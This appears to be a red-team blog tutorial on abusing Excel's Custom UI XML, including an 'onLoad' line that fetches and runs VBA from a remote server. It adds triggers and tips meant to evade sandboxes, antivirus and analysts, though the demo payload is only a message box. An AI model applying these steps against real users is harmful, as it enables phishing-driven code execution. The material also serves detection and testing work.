Execution of Remote VBA Script in Excel

Background

A few days ago I have read an excellent blog by Marc Elias from Trellix about a recent espionage campaign. In his post, he mentioned the adversary sent a phishing document using XLSX format, which does not support VBA scripting by design. However, the adversary used a technique that a specially crafted XLSX file will attempt to download an XLS file from a remote URL and launch the embedded VBA script resulting in code execution upon the victim opening the XLSX file.
I found this technique interesting and it is a bit similar to the "Remote Template" technique in Microsoft Word. Therefore, I decided to document how to re-perform the technique and discuss some other potential usages.
Before we start, I would like to credit and thank Marc Elias for sharing the detailed analysis of the adversary attack.

Custom UI Walkthrough

The technique is basically adding the Custom UI feature to an Excel document by inserting an XML file called "customUI.xml". The Custom UI is a feature designed by Microsoft to allow UI customizations of Microsoft Office documents and it has been abused by the adversary to create a specially crafted XLSX file to achieve code execution with the least user interaction.
In order to add a "customUI.xml" file to a legitimate XLSX file, a tool called "Custom UI Editor for Microsoft Office" will be used. This tool is created by Microsoft but currently is no longer supported by them.
Once you download and start the "Custom UI Editor for Microsoft Office", you will see a UI like this:
You can then click "Open" and select an XLSX Excel file that you want to modify:
Next, you can right-click the opened file and select "Office 2007 Custom UI Part":
You can then insert a specially crafted XML on the right-hand side of the UI. The XML consists of a remote URL linking to an XLS file and its VBA function.
<customUI xmlns="http://schemas.microsoft.com/office/2006/01/customui" onLoad='http://192.168.21.132/test.xls!ThisWorkbook.test'></customUI>
Now you can click the "Save" button to save the file and validate the syntax by clicking the "Validate" button.
On the other hand, let's prepare a VBA-friendly Excel file in XLS format called "test.xls" and insert the following VBA callback procedure (with reference to Microsoft document) to satisfy the parameter requirements for the "onLoad" function stated in the above XML.
Sub test(ribbon As IRibbonUI)
MsgBox "netero1010"
End Sub
You can now save your "test.xls" and host it on a web server (e.g., 192.168.21.132 in my case).

Execution

Once you complete all the steps above, you are now ready to execute the "demo.xlsx" file. Upon execution, you will see two warning messages:
Once you click "Enable" and "Enable Macros", the VBA script will be executed as below:
Investigation notes: The newly downloaded XLS file will be temporarily stored in "C:\Users\<current user>\AppData\Local\Microsoft\Windows\INetCache\Content.MSO".
On successful execution of the "demo.xlsx", your webserver will receive the HTTP request similar to the below:
As mentioned by HaiFeiLi, originally this technique has no warning message. However, Microsoft patched this vulnerability (CVE-2021-42292) in November 2021 and now it will pop up a warning message as shown in the above.

Pros and Cons of the Technique

Pros:
  • Bypass the detection of the sandbox, email gateway, and antivirus since the XLSX file has no harmful script except an XML file containing a link to a remote XLS/XLSM file
  • XLSX file can be used as the first stage payload since XLSX is generally less suspicious
  • Minimize the possibility of someone analyzing your VBA payload since you can configure the webserver to filter/disallow someone from downloading your VBA script
Cons:
  • Two warning messages will be popped up while opening the XLSX file and it might alert the victims

Other Usage of Custom UI

If you don't prefer the above usage because of warning messages popping up, you can still abuse the Custom UI feature for other evasion techniques.
For example, you could use the "onLoad' trigger to call a VBA function in your Excel without using "WorkbookOpen" and "Auto_Open" functions.
This works in both Microsoft Excel and Word.
To do so, create a new XLSM and add the following VBA script in the XLSM file under the "ThisWorkbook" in the VBA editor.
Sub test(ribbon As IRibbonUI)
Call MsgBox("netero1010")
End Sub
Start the "Custom UI Editor for Microsoft Office", open the newly created XLSM, and add "Office 2007 Custom UI Part" as below:
Insert the crafted XML in the right hand side:
<customUI xmlns="http://schemas.microsoft.com/office/2006/01/customui" onLoad="ThisWorkbook.test"></customUI>
Save the above XML and open the XLSM file. Your VBA script will be executed immediately after clicking the "Enable Content" button.
Using the above method, you could avoid the use of the classic "Workbook_Open" function which might be heavily examined by security products.
Apart from the "On Load" usage, you can also insert other command trigger functions (e.g., FileSave) into the Custom UI XML to trigger the execution of VBA script only when certain function button in Excel is clicked to achieve sandbox evasion. See below for a sample XML:
<customUI xmlns="http://schemas.microsoft.com/office/2006/01/customui">
<commands>
<command idMso="FileSave" onAction="ThisWorkbook.test" />
</commands>
</customUI>
For the VBA part, you can add the following VBA callback procedure to satisfy the parameter requirements for the "onAction" function:
Sub test(control As IRibbonControl, ByRef CancelDefault)
Call MsgBox("netero1010")
End Sub
With the above setup, the VBA script will be executed upon the "Save" button is clicked.
I hope this article could help defenders/red teamers to know more about how to use Custom UI on the offensive side.

Reference

VBA Ribbon - Custom UI Editor
Prime Minister’s Office Compromised: Details of Recent Espionage Campaign
Customizing the 2007 Office Fluent Ribbon for Developers (Part 3 of 3)
docsmsft